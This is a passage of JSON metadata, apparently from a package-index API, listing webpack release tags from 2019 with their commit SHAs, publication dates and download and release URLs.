ack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHu